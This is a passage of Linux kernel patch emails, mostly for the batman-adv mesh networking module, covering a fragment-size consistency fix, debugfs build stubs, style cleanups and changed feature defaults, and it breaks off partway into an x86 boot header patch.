B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/routing.h b/net/batman-adv/routing.h index 557d3d12a9ab..6573f12b3ddc 100644 --- a/net/batman-adv/routing.h +++ b/net/batman-adv/routing.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/send.c b/net/batman-adv/send.c index 3d64ed20c393..fa70ae8c9fe8 100644 --- a/net/batman-adv/send.c +++ b/net/batman-adv/send.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/send.h b/net/batman-adv/send.h index 38d0ec1833ae..60c233eb35ed 100644 --- a/net/batman-adv/send.h +++ b/net/batman-adv/send.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/soft-interface.c b/net/batman-adv/soft-interface.c index 5ec31d7de24f..d85a45c24f62 100644 --- a/net/batman-adv/soft-interface.c +++ b/net/batman-adv/soft-interface.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * diff --git a/net/batman-adv/soft-interface.h b/net/batman-adv/soft-interface.h index dbab22fd89a5..9ce08049ffd0 100644 --- a/net/batman-adv/soft-interface.h +++ b/net/batman-adv/soft-interface.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/sysfs.c b/net/batman-adv/sysfs.c index a75dc12f96f8..fa8c347bf057 100644 --- a/net/batman-adv/sysfs.c +++ b/net/batman-adv/sysfs.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2010-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2010-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/sysfs.h b/net/batman-adv/sysfs.h index b715b60db7cd..b9e79ad806ac 100644 --- a/net/batman-adv/sysfs.h +++ b/net/batman-adv/sysfs.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2010-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2010-2015 B.A.T.M.A.N. contributors: * * Marek Lindner * diff --git a/net/batman-adv/translation-table.c b/net/batman-adv/translation-table.c index 07b263a437d1..b098e53edded 100644 --- a/net/batman-adv/translation-table.c +++ b/net/batman-adv/translation-table.c @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich, Antonio Quartulli * diff --git a/net/batman-adv/translation-table.h b/net/batman-adv/translation-table.h index ad84d7b89e39..5769037c7e2d 100644 --- a/net/batman-adv/translation-table.h +++ b/net/batman-adv/translation-table.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich, Antonio Quartulli * diff --git a/net/batman-adv/types.h b/net/batman-adv/types.h index 9398c3fb4174..28f2461ea630 100644 --- a/net/batman-adv/types.h +++ b/net/batman-adv/types.h @@ -1,4 +1,4 @@ -/* Copyright (C) 2007-2014 B.A.T.M.A.N. contributors: +/* Copyright (C) 2007-2015 B.A.T.M.A.N. contributors: * * Marek Lindner, Simon Wunderlich * From 53e771457e823fbc21834f60508c42a4270534fd Mon Sep 17 00:00:00 2001 From: Sven Eckelmann Date: Mon, 1 Dec 2014 10:37:27 +0100 Subject: [PATCH 442/872] batman-adv: Check total_size when queueing fragments MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The fragmentation code was replaced in 610bfc6bc99bc83680d190ebc69359a05fc7f605 ("batman-adv: Receive fragmented packets and merge") by an implementation which handles the queueing+merging of fragments based on their size and the total_size of the non-fragmented packet. This total_size is announced by each fragment. The new implementation doesn't check if the the total_size information of the packets inside one chain is consistent. This is consistency check is recommended to allow using any of the packets in the queue to decide whether all fragments of a packet are received or not. Signed-off-by: Sven Eckelmann Acked-by: Martin Hundebøll Signed-off-by: Marek Lindner --- net/batman-adv/fragmentation.c | 7 +++++-- net/batman-adv/types.h | 2 ++ 2 files changed, 7 insertions(+), 2 deletions(-) diff --git a/net/batman-adv/fragmentation.c b/net/batman-adv/fragmentation.c index af495cc861fe..a9fc6537214b 100644 --- a/net/batman-adv/fragmentation.c +++ b/net/batman-adv/fragmentation.c @@ -161,6 +161,7 @@ static bool batadv_frag_insert_packet(struct batadv_orig_node *orig_node, hlist_add_head(&frag_entry_new->list, &chain->head); chain->size = skb->len - hdr_size; chain->timestamp = jiffies; + chain->total_size = ntohs(frag_packet->total_size); ret = true; goto out; } @@ -195,9 +196,11 @@ static bool batadv_frag_insert_packet(struct batadv_orig_node *orig_node, out: if (chain->size > batadv_frag_size_limit() || - ntohs(frag_packet->total_size) > batadv_frag_size_limit()) { + chain->total_size != ntohs(frag_packet->total_size) || + chain->total_size > batadv_frag_size_limit()) { /* Clear chain if total size of either the list or the packet - * exceeds the maximum size of one merged packet. + * exceeds the maximum size of one merged packet. Don't allow + * packets to have different total_size. */ batadv_frag_clear_chain(&chain->head); chain->size = 0; diff --git a/net/batman-adv/types.h b/net/batman-adv/types.h index 28f2461ea630..e95db4273356 100644 --- a/net/batman-adv/types.h +++ b/net/batman-adv/types.h @@ -132,6 +132,7 @@ struct batadv_orig_ifinfo { * @timestamp: time (jiffie) of last received fragment * @seqno: sequence number of the fragments in the list * @size: accumulated size of packets in list + * @total_size: expected size of the assembled packet */ struct batadv_frag_table_entry { struct hlist_head head; @@ -139,6 +140,7 @@ struct batadv_frag_table_entry { unsigned long timestamp; uint16_t seqno; uint16_t size; + uint16_t total_size; }; /** From 83e8b87721f21b26b843633caca8ef453e943623 Mon Sep 17 00:00:00 2001 From: Sven Eckelmann Date: Mon, 1 Dec 2014 10:37:28 +0100 Subject: [PATCH 443/872] batman-adv: Use only queued fragments when merging MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The fragment queueing code now validates the total_size of each fragment, checks when enough fragments are queued to allow to merge them into a single packet and if the fragments have the correct size. Therefore, it is not required to have any other parameter for the merging function than a list of queued fragments. This change should avoid problems like in the past when the different skb from the list and the function parameter were mixed incorrectly. Signed-off-by: Sven Eckelmann Acked-by: Martin Hundebøll Signed-off-by: Marek Lindner --- net/batman-adv/fragmentation.c | 13 +++++-------- 1 file changed, 5 insertions(+), 8 deletions(-) diff --git a/net/batman-adv/fragmentation.c b/net/batman-adv/fragmentation.c index a9fc6537214b..6ce3c84a7e55 100644 --- a/net/batman-adv/fragmentation.c +++ b/net/batman-adv/fragmentation.c @@ -231,19 +231,13 @@ static bool batadv_frag_insert_packet(struct batadv_orig_node *orig_node, * Returns the merged skb or NULL on error. */ static struct sk_buff * -batadv_frag_merge_packets(struct hlist_head *chain, struct sk_buff *skb) +batadv_frag_merge_packets(struct hlist_head *chain) { struct batadv_frag_packet *packet; struct batadv_frag_list_entry *entry; struct sk_buff *skb_out = NULL; int size, hdr_size = sizeof(struct batadv_frag_packet); - /* Make sure incoming skb has non-bogus data. */ - packet = (struct batadv_frag_packet *)skb->data; - size = ntohs(packet->total_size); - if (size > batadv_frag_size_limit()) - goto free; - /* Remove first entry, as this is the destination for the rest of the * fragments. */ @@ -252,6 +246,9 @@ batadv_frag_merge_packets(struct hlist_head *chain, struct sk_buff *skb) skb_out = entry->skb; kfree(entry); + packet = (struct batadv_frag_packet *)skb_out->data; + size = ntohs(packet->total_size); + /* Make room for the rest of the fragments. */ if (pskb_expand_head(skb_out, 0, size - skb_out->len, GFP_ATOMIC) < 0) { kfree_skb(skb_out); @@ -307,7 +304,7 @@ bool batadv_frag_skb_buffer(struct sk_buff **skb, if (hlist_empty(&head)) goto out; - skb_out = batadv_frag_merge_packets(&head, *skb); + skb_out = batadv_frag_merge_packets(&head); if (!skb_out) goto out_err; From 9bb218828c8f4fa6587af93e248903c96ce469d0 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:18 +0100 Subject: [PATCH 444/872] batman-adv: debugfs, avoid compiling for !DEBUG_FS Normally the debugfs framework will return error pointer with -ENODEV for function calls when DEBUG_FS is not set. batman does not notice this error code and continues trying to create debugfs files and executes more code. We can avoid this code execution by disabling compiling debugfs.c when DEBUG_FS is not set. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/Makefile | 2 +- net/batman-adv/debugfs.c | 8 -------- net/batman-adv/debugfs.h | 34 ++++++++++++++++++++++++++++++++++ 3 files changed, 35 insertions(+), 9 deletions(-) diff --git a/net/batman-adv/Makefile b/net/batman-adv/Makefile index 79833ebcc2dd..bd7e343c98d1 100644 --- a/net/batman-adv/Makefile +++ b/net/batman-adv/Makefile @@ -20,7 +20,7 @@ obj-$(CONFIG_BATMAN_ADV) += batman-adv.o batman-adv-y += bat_iv_ogm.o batman-adv-y += bitarray.o batman-adv-$(CONFIG_BATMAN_ADV_BLA) += bridge_loop_avoidance.o -batman-adv-y += debugfs.o +batman-adv-$(CONFIG_DEBUG_FS) += debugfs.o batman-adv-$(CONFIG_BATMAN_ADV_DAT) += distributed-arp-table.o batman-adv-y += fragmentation.o batman-adv-y += gateway_client.o diff --git a/net/batman-adv/debugfs.c b/net/batman-adv/debugfs.c index 0c213a892296..46118084221a 100644 --- a/net/batman-adv/debugfs.c +++ b/net/batman-adv/debugfs.c @@ -482,11 +482,7 @@ int batadv_debugfs_add_hardif(struct batadv_hard_iface *hard_iface) debugfs_remove_recursive(hard_iface->debug_dir); hard_iface->debug_dir = NULL; out: -#ifdef CONFIG_DEBUG_FS return -ENOMEM; -#else - return 0; -#endif /* CONFIG_DEBUG_FS */ } /** @@ -541,11 +537,7 @@ int batadv_debugfs_add_meshif(struct net_device *dev) debugfs_remove_recursive(bat_priv->debug_dir); bat_priv->debug_dir = NULL; out: -#ifdef CONFIG_DEBUG_FS return -ENOMEM; -#else - return 0; -#endif /* CONFIG_DEBUG_FS */ } void batadv_debugfs_del_meshif(struct net_device *dev) diff --git a/net/batman-adv/debugfs.h b/net/batman-adv/debugfs.h index f3b49c394446..ed25605ca732 100644 --- a/net/batman-adv/debugfs.h +++ b/net/batman-adv/debugfs.h @@ -20,6 +20,8 @@ #define BATADV_DEBUGFS_SUBDIR "batman_adv" +#if IS_ENABLED(CONFIG_DEBUG_FS) + void batadv_debugfs_init(void); void batadv_debugfs_destroy(void); int batadv_debugfs_add_meshif(struct net_device *dev); @@ -27,4 +29,36 @@ void batadv_debugfs_del_meshif(struct net_device *dev); int batadv_debugfs_add_hardif(struct batadv_hard_iface *hard_iface); void batadv_debugfs_del_hardif(struct batadv_hard_iface *hard_iface); +#else + +static inline void batadv_debugfs_init(void) +{ +} + +static inline void batadv_debugfs_destroy(void) +{ +} + +static inline int batadv_debugfs_add_meshif(struct net_device *dev) +{ + return 0; +} + +static inline void batadv_debugfs_del_meshif(struct net_device *dev) +{ +} + +static inline +int batadv_debugfs_add_hardif(struct batadv_hard_iface *hard_iface) +{ + return 0; +} + +static inline +void batadv_debugfs_del_hardif(struct batadv_hard_iface *hard_iface) +{ +} + +#endif + #endif /* _NET_BATMAN_ADV_DEBUGFS_H_ */ From 16b9ce83fb850602794a3bc534693362408a5408 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:23 +0100 Subject: [PATCH 445/872] batman-adv: tvlv realloc, move error handling into if block Instead of hiding the normal function flow inside an if block, we should just put the error handling into the if block. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/main.c | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/net/batman-adv/main.c b/net/batman-adv/main.c index ca63d487c490..fd9333dffc97 100644 --- a/net/batman-adv/main.c +++ b/net/batman-adv/main.c @@ -819,15 +819,15 @@ static bool batadv_tvlv_realloc_packet_buff(unsigned char **packet_buff, new_buff = kmalloc(min_packet_len + additional_packet_len, GFP_ATOMIC); /* keep old buffer if kmalloc should fail */ - if (new_buff) { - memcpy(new_buff, *packet_buff, min_packet_len); - kfree(*packet_buff); - *packet_buff = new_buff; - *packet_buff_len = min_packet_len + additional_packet_len; - return true; - } + if (!new_buff) + return false; + + memcpy(new_buff, *packet_buff, min_packet_len); + kfree(*packet_buff); + *packet_buff = new_buff; + *packet_buff_len = min_packet_len + additional_packet_len; - return false; + return true; } /** From 9fc1883ef25a43b895531ac44a38257ba8c2ca62 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:25 +0100 Subject: [PATCH 446/872] batman-adv: Makefile, Sort alphabetically The whole Makefile is sorted, just the multicast rule is not at the right position. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/Makefile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/Makefile b/net/batman-adv/Makefile index bd7e343c98d1..21434ab79d2c 100644 --- a/net/batman-adv/Makefile +++ b/net/batman-adv/Makefile @@ -29,6 +29,7 @@ batman-adv-y += hard-interface.o batman-adv-y += hash.o batman-adv-y += icmp_socket.o batman-adv-y += main.o +batman-adv-$(CONFIG_BATMAN_ADV_MCAST) += multicast.o batman-adv-$(CONFIG_BATMAN_ADV_NC) += network-coding.o batman-adv-y += originator.o batman-adv-y += routing.o @@ -36,4 +37,3 @@ batman-adv-y += send.o batman-adv-y += soft-interface.o batman-adv-y += sysfs.o batman-adv-y += translation-table.o -batman-adv-$(CONFIG_BATMAN_ADV_MCAST) += multicast.o From 42d9f2cbd42e1ba137584da8305cf6f68b84f39d Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:26 +0100 Subject: [PATCH 447/872] batman-adv: iv_ogm_iface_enable, direct return values Directly return error values. No need to use a return variable. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index fc299c03a438..123aabbcb003 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -308,7 +308,6 @@ static int batadv_iv_ogm_iface_enable(struct batadv_hard_iface *hard_iface) struct batadv_ogm_packet *batadv_ogm_packet; unsigned char *ogm_buff; uint32_t random_seqno; - int res = -ENOMEM; /* randomize initial seqno to avoid collision */ get_random_bytes(&random_seqno, sizeof(random_seqno)); @@ -317,7 +316,7 @@ static int batadv_iv_ogm_iface_enable(struct batadv_hard_iface *hard_iface) hard_iface->bat_iv.ogm_buff_len = BATADV_OGM_HLEN; ogm_buff = kmalloc(hard_iface->bat_iv.ogm_buff_len, GFP_ATOMIC); if (!ogm_buff) - goto out; + return -ENOMEM; hard_iface->bat_iv.ogm_buff = ogm_buff; @@ -329,10 +328,7 @@ static int batadv_iv_ogm_iface_enable(struct batadv_hard_iface *hard_iface) batadv_ogm_packet->reserved = 0; batadv_ogm_packet->tq = BATADV_TQ_MAX_VALUE; - res = 0; - -out: - return res; + return 0; } static void batadv_iv_ogm_iface_disable(struct batadv_hard_iface *hard_iface) From 9fd9b19ea03cce2e47544a3b8e0b532485b34758 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:27 +0100 Subject: [PATCH 448/872] batman-adv: iv_ogm_aggr_packet, bool return value This function returns bool values, so it should be defined to return them instead of the whole int range. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 123aabbcb003..00151385ad11 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -392,8 +392,8 @@ static uint8_t batadv_hop_penalty(uint8_t tq, } /* is there another aggregated packet here? */ -static int batadv_iv_ogm_aggr_packet(int buff_pos, int packet_len, - __be16 tvlv_len) +static bool batadv_iv_ogm_aggr_packet(int buff_pos, int packet_len, + __be16 tvlv_len) { int next_buff_pos = 0; From de12baece9b8010d036b4104a9f08d21418b60e8 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:28 +0100 Subject: [PATCH 449/872] batman-adv: iv_ogm_send_to_if, declare char* as const This string pointer is later assigned to a constant string, so it should be defined constant at the beginning. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index 00151385ad11..f9c561094942 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -409,7 +409,7 @@ static void batadv_iv_ogm_send_to_if(struct batadv_forw_packet *forw_packet, struct batadv_hard_iface *hard_iface) { struct batadv_priv *bat_priv = netdev_priv(hard_iface->soft_iface); - char *fwd_str; + const char *fwd_str; uint8_t packet_num; int16_t buff_pos; struct batadv_ogm_packet *batadv_ogm_packet; From dab7b62190c5abbe90eef4e9f9e7c28492e77eba Mon Sep 17 00:00:00 2001 From: Sven Eckelmann Date: Wed, 18 Feb 2015 18:20:24 +0100 Subject: [PATCH 450/872] batman-adv: Use safer default config for optional features MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The current default settings for optional features in batman-adv seems to be based around the idea that the user only compiles what he requires. They will automatically enabled when they are compiled in. For example the network coding part of batman-adv is by default disabled in the out-of-tree module but will be enabled when the code is compiled during the module build. But distributions like Debian just enable all features of the batman-adv kernel module and hope that more experimental features or features with possible negative effects have to be enabled using some runtime configuration interface. The network_coding feature can help in specific setups but also has drawbacks and is not disabled by default in the out-of-tree module. Disabling by default in the runtime config seems to be also quite sane. The bridge_loop_avoidance is the only feature which is disabled by default but may be necessary even in simple setups. Packet loops may even be created during the initial node setup when this is not enabled. This is different than STP on bridges because mesh is usually used on Adhoc WiFi. Having two nodes (by accident) in the same LAN segment and in the same mesh network is rather common in this situation. Signed-off-by: Sven Eckelmann Acked-by: Martin Hundebøll Signed-off-by: Marek Lindner --- net/batman-adv/network-coding.c | 2 +- net/batman-adv/soft-interface.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/net/batman-adv/network-coding.c b/net/batman-adv/network-coding.c index 89e1d4772cff..4cb70bb4c3e8 100644 --- a/net/batman-adv/network-coding.c +++ b/net/batman-adv/network-coding.c @@ -155,7 +155,7 @@ int batadv_nc_mesh_init(struct batadv_priv *bat_priv) */ void batadv_nc_init_bat_priv(struct batadv_priv *bat_priv) { - atomic_set(&bat_priv->network_coding, 1); + atomic_set(&bat_priv->network_coding, 0); bat_priv->nc.min_tq = 200; bat_priv->nc.max_fwd_delay = 10; bat_priv->nc.max_buffer_time = 200; diff --git a/net/batman-adv/soft-interface.c b/net/batman-adv/soft-interface.c index d85a45c24f62..9426b83caab6 100644 --- a/net/batman-adv/soft-interface.c +++ b/net/batman-adv/soft-interface.c @@ -732,7 +732,7 @@ static int batadv_softif_init_late(struct net_device *dev) atomic_set(&bat_priv->aggregated_ogms, 1); atomic_set(&bat_priv->bonding, 0); #ifdef CONFIG_BATMAN_ADV_BLA - atomic_set(&bat_priv->bridge_loop_avoidance, 0); + atomic_set(&bat_priv->bridge_loop_avoidance, 1); #endif #ifdef CONFIG_BATMAN_ADV_DAT atomic_set(&bat_priv->distributed_arp_table, 1); From 00f548bf5494ade996ae9c5e85c497dd2a3fdad5 Mon Sep 17 00:00:00 2001 From: Marek Lindner Date: Wed, 18 Feb 2015 22:17:30 +0800 Subject: [PATCH 451/872] batman-adv: checkpatch - comparison to NULL could be rewritten Signed-off-by: Marek Lindner --- net/batman-adv/soft-interface.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/soft-interface.c b/net/batman-adv/soft-interface.c index 9426b83caab6..50cf722f4e1b 100644 --- a/net/batman-adv/soft-interface.c +++ b/net/batman-adv/soft-interface.c @@ -818,7 +818,7 @@ static int batadv_softif_slave_add(struct net_device *dev, int ret = -EINVAL; hard_iface = batadv_hardif_get_by_netdev(slave_dev); - if (!hard_iface || hard_iface->soft_iface != NULL) + if (!hard_iface || hard_iface->soft_iface) goto out; ret = batadv_hardif_enable_interface(hard_iface, dev->name); From fc1f86936651191ca51e532083206efb351ccd9c Mon Sep 17 00:00:00 2001 From: Marek Lindner Date: Wed, 18 Feb 2015 22:19:20 +0800 Subject: [PATCH 452/872] batman-adv: checkpatch - spaces preferred around that '*' Signed-off-by: Marek Lindner --- net/batman-adv/main.h | 2 +- net/batman-adv/network-coding.c | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/net/batman-adv/main.h b/net/batman-adv/main.h index 11d2d9fbfc5e..026ba37f31a6 100644 --- a/net/batman-adv/main.h +++ b/net/batman-adv/main.h @@ -44,7 +44,7 @@ #define BATADV_TT_CLIENT_TEMP_TIMEOUT 600000 /* in milliseconds */ #define BATADV_TT_WORK_PERIOD 5000 /* 5 seconds */ #define BATADV_ORIG_WORK_PERIOD 1000 /* 1 second */ -#define BATADV_DAT_ENTRY_TIMEOUT (5*60000) /* 5 mins in milliseconds */ +#define BATADV_DAT_ENTRY_TIMEOUT (5 * 60000) /* 5 mins in milliseconds */ /* sliding packet range of received originator messages in sequence numbers * (should be a multiple of our word size) */ diff --git a/net/batman-adv/network-coding.c b/net/batman-adv/network-coding.c index 4cb70bb4c3e8..b984bc49deaf 100644 --- a/net/batman-adv/network-coding.c +++ b/net/batman-adv/network-coding.c @@ -275,7 +275,7 @@ static bool batadv_nc_to_purge_nc_path_decoding(struct batadv_priv *bat_priv, * max_buffer time */ return batadv_has_timed_out(nc_path->last_valid, - bat_priv->nc.max_buffer_time*10); + bat_priv->nc.max_buffer_time * 10); } /** From 8f34b388786a952382c829453f280384f1bf3886 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:29 +0100 Subject: [PATCH 453/872] batman-adv: iv_ogm_can_aggregate, code readability This patch tries to increase code readability by negating the first if block and rearranging some of the other conditional blocks. This way we save an indentation level, we also save some allocation that is not necessary for one of the conditions. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 102 +++++++++++++++++++----------------- 1 file changed, 53 insertions(+), 49 deletions(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index f9c561094942..ce04cd75fae4 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -544,58 +544,62 @@ batadv_iv_ogm_can_aggregate(const struct batadv_ogm_packet *new_bat_ogm_packet, * - the send time is within our MAX_AGGREGATION_MS time * - the resulting packet wont be bigger than * MAX_AGGREGATION_BYTES + * otherwise aggregation is not possible */ - if (time_before(send_time, forw_packet->send_time) && - time_after_eq(aggregation_end_time, forw_packet->send_time) && - (aggregated_bytes <= BATADV_MAX_AGGREGATION_BYTES)) { - /* check aggregation compatibility - * -> direct link packets are broadcasted on - * their interface only - * -> aggregate packet if the current packet is - * a "global" packet as well as the base - * packet - */ - primary_if = batadv_primary_if_get_selected(bat_priv); - if (!primary_if) - goto out; - - /* packet is not leaving on the same interface. */ - if (forw_packet->if_outgoing != if_outgoing) - goto out; + if (!time_before(send_time, forw_packet->send_time) || + !time_after_eq(aggregation_end_time, forw_packet->send_time)) + return false; + + if (aggregated_bytes > BATADV_MAX_AGGREGATION_BYTES) + return false; + + /* packet is not leaving on the same interface. */ + if (forw_packet->if_outgoing != if_outgoing) + return false; + + /* check aggregation compatibility + * -> direct link packets are broadcasted on + * their interface only + * -> aggregate packet if the current packet is + * a "global" packet as well as the base + * packet + */ + primary_if = batadv_primary_if_get_selected(bat_priv); + if (!primary_if) + return false; - /* packets without direct link flag and high TTL - * are flooded through the net - */ - if ((!directlink) && - (!(batadv_ogm_packet->flags & BATADV_DIRECTLINK)) && - (batadv_ogm_packet->ttl != 1) && - - /* own packets originating non-primary - * interfaces leave only that interface - */ - ((!forw_packet->own) || - (forw_packet->if_incoming == primary_if))) { - res = true; - goto out; - } + /* packets without direct link flag and high TTL + * are flooded through the net + */ + if (!directlink && + !(batadv_ogm_packet->flags & BATADV_DIRECTLINK) && + batadv_ogm_packet->ttl != 1 && + + /* own packets originating non-primary + * interfaces leave only that interface + */ + (!forw_packet->own || + forw_packet->if_incoming == primary_if)) { + res = true; + goto out; + } - /* if the incoming packet is sent via this one - * interface only - we still can aggregate - */ - if ((directlink) && - (new_bat_ogm_packet->ttl == 1) && - (forw_packet->if_incoming == if_incoming) && - - /* packets from direct neighbors or - * own secondary interface packets - * (= secondary interface packets in general) - */ - (batadv_ogm_packet->flags & BATADV_DIRECTLINK || - (forw_packet->own && - forw_packet->if_incoming != primary_if))) { - res = true; - goto out; - } + /* if the incoming packet is sent via this one + * interface only - we still can aggregate + */ + if (directlink && + new_bat_ogm_packet->ttl == 1 && + forw_packet->if_incoming == if_incoming && + + /* packets from direct neighbors or + * own secondary interface packets + * (= secondary interface packets in general) + */ + (batadv_ogm_packet->flags & BATADV_DIRECTLINK || + (forw_packet->own && + forw_packet->if_incoming != primary_if))) { + res = true; + goto out; } out: From 01b97a3eed3fe40e3a007d56935b421023bca2e3 Mon Sep 17 00:00:00 2001 From: Markus Pargmann Date: Fri, 26 Dec 2014 12:41:30 +0100 Subject: [PATCH 454/872] batman-adv: iv_ogm_orig_update, remove unnecessary brackets Remove these unnecessary brackets inside a condition. Signed-off-by: Markus Pargmann Signed-off-by: Marek Lindner --- net/batman-adv/bat_iv_ogm.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/bat_iv_ogm.c b/net/batman-adv/bat_iv_ogm.c index ce04cd75fae4..c5ba7a798de7 100644 --- a/net/batman-adv/bat_iv_ogm.c +++ b/net/batman-adv/bat_iv_ogm.c @@ -1081,7 +1081,7 @@ batadv_iv_ogm_orig_update(struct batadv_priv *bat_priv, * won't consider it either */ if (router_ifinfo && - (neigh_ifinfo->bat_iv.tq_avg == router_ifinfo->bat_iv.tq_avg)) { + neigh_ifinfo->bat_iv.tq_avg == router_ifinfo->bat_iv.tq_avg) { orig_node_tmp = router->orig_node; spin_lock_bh(&orig_node_tmp->bat_iv.ogm_cnt_lock); if_num = router->if_incoming->if_num; From 8ea64e27080eb66dc26f64f28485c0bc9fc06b36 Mon Sep 17 00:00:00 2001 From: Antonio Quartulli Date: Mon, 11 May 2015 20:34:52 +0200 Subject: [PATCH 455/872] batman-adv: Use common declaration order in *_send_skb_(packet|unicast) Signed-off-by: Antonio Quartulli --- net/batman-adv/send.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/net/batman-adv/send.c b/net/batman-adv/send.c index fa70ae8c9fe8..23635bd63fec 100644 --- a/net/batman-adv/send.c +++ b/net/batman-adv/send.c @@ -255,8 +255,8 @@ int batadv_send_skb_unicast(struct batadv_priv *bat_priv, struct batadv_orig_node *orig_node, unsigned short vid) { - struct ethhdr *ethhdr; struct batadv_unicast_packet *unicast_packet; + struct ethhdr *ethhdr; int ret = NET_XMIT_DROP; if (!orig_node) From 927392d73a97d8d235bb65400e2e3c7f0bec2b6f Mon Sep 17 00:00:00 2001 From: Ingo Molnar Date: Fri, 23 Nov 2012 19:19:07 +0100 Subject: [PATCH 456/872] x86/boot: Add CONFIG_PARAVIRT_SPINLOCKS quirk to arch/x86/boot/compressed/misc.h MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Linus reported the following new warning on x86 allmodconfig with GCC 5.1: > ./arch/x86/include/asm/spinlock.h: In function ‘arch_spin_lock’: > ./arch/x86/include/asm/spinlock.h:119:3: warning: implicit declaration > of function ‘__ticket_lock_spinning’ [-Wimplicit-function-declaration] > __ticket_lock_spinning(lock, inc.tail); > ^ This warning triggers because of these hacks in misc.h: /* * we have to be careful, because no indirections are allowed here, and * paravirt_ops is a kind of one. As it will only run in baremetal anyway, * we just keep it from happening */ #undef CONFIG_PARAVIRT #undef CONFIG_KASAN But these hacks were not updated when CONFIG_PARAVIRT_SPINLOCKS was added, and eventually (with the introduction of queued paravirt spinlocks in recent kernels) this created an invalid Kconfig combination and broke the build. So add a CONFIG_PARAVIRT_SPINLOCKS #undef line as well. Also remove the _ASM_X86_DESC_H quirk: that undocumented quirk was originally added ages ago, in: 099e1377269a ("x86: use ELF format in compressed images.") and I went back to that kernel (and fixed up the main Makefile which didn't build anymore) and checked what failure it avoided: it avoided an include file dependencies related build failure related to our old x86-platforms code. That old code is long gone, the header dependencies got cleaned up, and the build does not fail anymore with the totality of asm/desc.h included - so remove the quirk. Reported-by: Linus 